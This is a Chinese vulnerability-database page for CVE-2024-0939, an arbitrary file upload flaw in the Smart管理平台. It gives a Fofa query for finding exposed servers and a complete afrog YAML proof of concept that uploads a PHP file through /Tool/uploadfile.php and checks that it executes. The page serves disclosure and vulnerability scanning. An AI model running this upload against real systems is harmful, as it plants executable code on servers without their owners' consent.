CVE-2024-0939: Smart管理平台多版本任意文件上传

日期: 2025-09-01 | 影响软件: Smart管理平台 | POC: 已公开

漏洞描述

Fofa: "Smart管理平台"

PoC代码[已公开]

id: CVE-2024-0939

info:
  name: Smart管理平台多版本任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Fofa: "Smart管理平台"
  reference:
    - https://mp.weixin.qq.com/s/Z9YR9BWSBFFdR1j0W9GRFg
  tags: cve,cve2024,smart,fileupload
  created: 2024/02/19

set:
  randstr: randomLowercase(6)
  rboundary: randomLowercase(8)
  s1: randomInt(100000, 200000)
  s2: randomInt(100000, 200000)
rules:
  r0:
    request:
      method: POST
      path: /Tool/uploadfile.php?
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file_upload\"; filename=\"contents.php\"\r\n\
        Content-Type: application/octet-stream\r\n\
        \r\n\
        <?php print({{s1}}*{{s2}}); ?>\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"txt_path\"\r\n\
        \r\n\
        /home/{{randstr}}.php\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /home/{{randstr}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(string(s1*s2)))
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2024/CVE-2024-0939.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

百卓Smart管理平台 /sysmanage/licence.php 文件上传漏洞 无POC

百卓-Smart管理平台 /autheditpwd.php SQL注入漏洞 无POC

百卓-Smart管理平台 /etc/db 未授权访问漏洞 无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

百卓Smart管理平台 /sysmanage/licence.php 文件上传漏洞无POC

百卓-Smart管理平台 /autheditpwd.php SQL注入漏洞无POC

百卓-Smart管理平台 /etc/db 未授权访问漏洞无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893）无POC

Whoogle search 代码执行漏洞（CVE-2024-53305）无POC